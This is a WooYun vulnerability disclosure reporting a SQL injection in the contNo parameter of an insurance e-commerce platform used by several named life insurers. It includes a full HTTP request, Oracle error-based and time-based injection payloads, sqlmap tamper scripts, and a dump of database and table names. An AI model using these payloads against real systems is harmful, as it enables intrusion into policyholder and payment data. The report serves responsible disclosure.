当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0155114

漏洞标题:某人寿保险商城系统通用SQL注入漏洞之二

相关厂商:国家互联网应急中心

漏洞作者: 路人甲

提交时间:2015-11-23 14:44

修复时间:2015-12-17 14:48

公开时间:2015-12-17 14:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-23: 细节已通知厂商并且等待厂商处理中
2015-11-27: 厂商已经确认,细节仅向厂商公开
2015-11-30: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航
2016-01-21: 细节向核心白帽子及相关领域专家公开
2016-01-31: 细节向普通白帽子公开
2016-02-10: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

某人寿保险商城系统通用SQL注入漏洞#2

详细说明:

接http://**.**.**.**/bugs/wooyun-2015-0151719 发现还有一个
涉及国华人寿、珠江人寿、君康人寿、国联人寿、中韩人寿等 其中不乏已经入驻的厂商。
漏洞位置:/eservice/asset/asset.do
注入参数:contNo
注:漏洞利用之前,需注册个普通会员账号,这个比较简单,就不多赘述。
部分案例如下:

国华人寿
**.**.**.**/eservice/account/register.action?action=initSingle
珠江人寿
**.**.**.**/eservice/account/register.action?action=initSingle
君康人寿
**.**.**.**/eservice/account/register.action?action=initSingle
国联人寿
**.**.**.**/eservice/eservice/account/register.action ?action=initSingle
中韩人寿
**.**.**.**/eservice/account/login.action ?action=initSingle


漏洞验证:
珠江人寿:
**.**.**.**/eservice/account/register.action?action=initSingle
注册个人普通用户登陆:
个人中心——我的收益——-保单号查询

11.png


POST /eservice/asset/asset.do?action=getLinkedConts&ajax=true HTTP/1.1
x-requested-with: XMLHttpRequest
Accept-Language: zh-cn
Referer: http://**.**.**.**/eservice/user/customer.do?action=home&username=weaver
Accept: application/xml, text/xml, */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: **.**.**.**
Content-Length: 108
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: __ghuid=51889761446607646641; JSESSIONID=HL23WRdbzgBypYNQbVSqpJbC0Nyh2FQrdGQ4BmP2txXVtgnFt55R!466292693; prlife_point=A001e5fe40f2c1ab5b2b930f8e512761425eHL23WRdbzgBypYNQbVSqpJbC0Nyh2FQrdGQ4BmP2txXVtgnFt55R!466292693!1448205755481; SERVERID=35e68b17710f16ae0d3436af3358bffd|1448206706|1448205755
contNo=1111&endValidateDate=&startValidateDate=&_search=false&nd=1448206710146&rows=10&page=1&sidx=&sord=asc


可使用脚本between.py

---
Parameter: contNo (POST)
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
Payload: contNo=1111' AND 4737=CTXSYS.DRITHSX.SN(4737,(CHR(113)||CHR(122)||C
HR(98)||CHR(98)||CHR(113)||(SELECT (CASE WHEN (4737=4737) THEN 1 ELSE 0 END) FRO
M DUAL)||CHR(113)||CHR(118)||CHR(118)||CHR(122)||CHR(113))) AND 'GYIJ' LIKE 'GYI
J&endValidateDate=&startValidateDate=&_search=false&nd=1448206710146&rows=10&pag
e=1&sidx=&sord=asc
Type: AND/OR time-based blind
Title: Oracle AND time-based blind (heavy query)
Payload: contNo=1111' AND 6818=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS
T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) AND 'zTOy' LIKE 'zTOy&endValidateDate
=&startValidateDate=&_search=false&nd=1448206710146&rows=10&page=1&sidx=&sord=as
c
---


11.png


available databases [10]:
[*] APEX_030200
[*] CTXSYS
[*] ESERVICE
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] POINT
[*] SYS
[*] SYSTEM
[*] XDB


Database: ESERVICE
[171 tables]
+--------------------------------+
| BAK_T_ACCOUNT_VALUE_D_0819 |
| BAK_T_ACCOUNT_VALUE_D_SNP_0819 |
| EBIZ_ACCOUNT_AUTH |
| EBIZ_APPLY_SURRENDER |
| EBIZ_APPNT |
| EBIZ_APPOINTMENT_DETAIL |
| EBIZ_APPOINTMENT_INFO |
| EBIZ_BATCH_INFO |
| EBIZ_BNF |
| EBIZ_BUSINESS_TRADE |
| EBIZ_CHECK_BATCH |
| EBIZ_CHECK_DETAIL |
| EBIZ_CLAIM_REPORT |
| EBIZ_CODE |
| EBIZ_COMPLAIN_SUGGEST |
| EBIZ_CONT_RENEWAL |
| EBIZ_CONT_RENEWAL_DETAIL |
| EBIZ_CONT_TOPUP |
| EBIZ_CORE_ESERVICE_IMPORT |
| EBIZ_CORE_INSURANCE_IMPORT |
| EBIZ_CORE_SURRENDER |
| EBIZ_ELEC_CONT |
| EBIZ_ELEC_NOTICE |
| EBIZ_ENSURE_LIABILITY |
| EBIZ_GROUP_BILLNO |
| EBIZ_HOLIDAY_MONTH_COUNT |
| EBIZ_ID_VERIFY |
| EBIZ_IMPART |
| EBIZ_IMPART_ITEM |
| EBIZ_INSURED |
| EBIZ_IP_RECORD |
| EBIZ_JD_REFUND |
| EBIZ_JKB_ACCOUNT |
| EBIZ_JKB_ORDER_CLAIM |
| EBIZ_JKB_PAY_ORDER |
| EBIZ_JKB_PLATFORM |
| EBIZ_JKB_REFUND |
| EBIZ_LOGIN_CHECK |
| EBIZ_MAIL_SEND |
| EBIZ_MESSAGE_EXCHANGE |
| EBIZ_MESSAGE_TEMPLATE |
| EBIZ_MOBILE_RECHARGE |
| EBIZ_OCCUPATION |
| EBIZ_OPER_HIS |
| EBIZ_ORDER |
| EBIZ_ORDER_ACCOUNT |
| EBIZ_ORDER_AUTH |
| EBIZ_ORDER_INSURANCE |
| EBIZ_ORDER_REVISIT |
| EBIZ_ORDER_REVISIT_DETAIL |
| EBIZ_ORDER_RISK_AMNT |
| EBIZ_ORDER_SURRENDER |
| EBIZ_ORDER_TYPE_PROPERTY |
| EBIZ_PAYMENT |
| EBIZ_POINT_ACCOUNT |
| EBIZ_POINT_ACTION |
| EBIZ_POINT_AUDIT |
| EBIZ_POINT_EVENT |
| EBIZ_POINT_EXCHANGE |
| EBIZ_POINT_EXCHANGE_DETAIL |
| EBIZ_POINT_GIFT |
| EBIZ_POINT_HISTORY |
| EBIZ_POINT_ORDER |
| EBIZ_POINT_RULE |
| EBIZ_POINT_TASK |
| EBIZ_PORTRAY_ATTACH |
| EBIZ_PRODUCT |
| EBIZ_PRODUCT_CHECKRULE |
| EBIZ_PRODUCT_ENSURE |
| EBIZ_PRODUCT_OCCUPATION |
| EBIZ_PRODUCT_PROPERTY |
| EBIZ_PRODUCT_RECOMMEND |
| EBIZ_PUBLIC_ALARM |
| EBIZ_PUBLIC_FEEBACK |
| EBIZ_PUBLIC_MENU |
| EBIZ_PUBLIC_MESSAGE |
| EBIZ_PUBLIC_MSG_EXCHANGE |
| EBIZ_PUBLIC_PLATFORM |
| EBIZ_PUBLIC_RECEIVE_CONFIG |
| EBIZ_PUBLIC_SEND |
| EBIZ_PUBLIC_USER |
| EBIZ_RECIPIENT_INFO |
| EBIZ_RECOMMENDED |
| EBIZ_RECOMMEND_CHANNEL |
| EBIZ_RECOMMEND_PROMOTER |
| EBIZ_RECOMMEND_REWARD |
| EBIZ_RECOMMEND_REWARD_RULE |
| EBIZ_SMS_TIME |
| EBIZ_SMS_WAITQUEUE |
| EBIZ_STATISTICS_HIS |
| EBIZ_STATISTICS_VISITOR |
| EBIZ_SY_BANKLOCATIONS |
| EBIZ_SY_BANKS |
| EBIZ_SY_STANDARDAREAS |
| EBIZ_TEL_ACTIVITY |
| EBIZ_TEL_ACT_PRO |
| EBIZ_TEL_DEPT |
| EBIZ_TEL_ORDER |
| EBIZ_TEL_RESERVE |
| EBIZ_TEL_ROLE |
| EBIZ_TEL_SETTLE |
| EBIZ_TEL_USER |
| EBIZ_TEL_USER_DEPT |
| EBIZ_TEL_USER_ROLE |
| EBIZ_THIRD_FILE |
| EBIZ_THIRD_NOTIFY |
| EBIZ_THIRD_ORDER |
| EBIZ_THIRD_REFUND_PAYMENT |
| EBIZ_THIRD_SURRENDER |
| EBIZ_THIRD_TOPUP |
| EBIZ_THIRD_TRADE |
| EBIZ_THIRD_TRADE_2015012901 |
| EBIZ_THIRD_TRADE_20150501 |
| EBIZ_THIRD_TRADE_20150813 |
| EBIZ_THIRD_TRADE_BAK |
| EBIZ_THIRD_TRADE_HIS |
| EBIZ_USER_HIS |
| EBIZ_USER_MERGE |
| EBIZ_USER_MERGE_DETAIL |
| EBIZ_USER_SUBSCRIBE |
| EBIZ_USER_THIRD_INFO |
| EBIZ_USER_WEIXIN_INFO |
| EBIZ_VALIDATE_CODE |
| EBIZ_WEBSITE_LOAN_RATE |
| EBIZ_WEBSITE_RATE |
| EBIZ_WEBSITE_RATE_DATE |
| EBIZ_WEBSITE_RATE_PRODUCT |
| EBIZ_WEIXIN_MESSAGE |
| EBIZ_ZCB_OPERATE |
| EBIZ_ZCB_ORDER |
| EBIZ_ZCB_PRODUCT |
| ES_CUSTOMERCONT |
| ETL_LOAD_PARA_BATCH |
| ETL_LOAD_RESET |
| MAIL_MAIN_ATTACHMENT_TAB |
| MAIL_MAIN_ATTACHMENT_TAB_BAK |
| MAIL_MAIN_TAB |
| MAIL_MAIN_TAB_BAK |
| ORDER_RECOMMEND |
| PAY_TRADE_MISSION |
| PAY_TRADE_REQUEST |
| PF_CODE |
| PF_CPERMISSION |
| PF_CROLE |
| PF_CROLECPERMISSION |
| PF_CROLECUSTOMER |
| PF_CUSTOMER |
| RECIPIENT_INFO |
| TEMP_TAOBAO1212 |
| TEMP_TAOBAO1212_YYKH |
| TEMP_TAOBAO1212_ZM |
| TOPIC_ACTIVITY |
| TOPIC_ACTIVITY_RECOMMEND |
| TOPIC_CUSTOMER |
| TOPIC_GIFT |
| TOPIC_GIFT_LIST |
| TOPIC_GIFT_POOL |
| TOPIC_SNOWY_CHILDREN |
| T_ACCOUNT_VALUE_D |
| T_ACCOUNT_VALUE_D_SNP |
| T_ACCOUNT_VALUE_D_SNP_TMP0912 |
| T_ACCOUNT_VALUE_D_TMP0912 |
| T_ALL_PERMIUM_EBIZ |
| T_AML_MONITOR_LIST |
| T_OUTSRV_TRANS_PRE |
| T_PAY |
| T_PAY_20151015 |
| T_PAY_CORE |
| T_TMP_BANK |
| T_WY_PAY |
| WEIXIN_MAIN_TAB |
+--------------------------------+


11.png


君康人寿: 可使用between.py,space2comment.py,randomcase.py
**.**.**.**/eservice/account/register.action?action=initSingle

11.png


11.png


当前数据库:

11.png

漏洞证明:

如上!

修复方案:

如上!

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-11-27 10:44

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向证券业信息化主管部门通报,由其后续协调网站管理单位处置。

最新状态:

暂无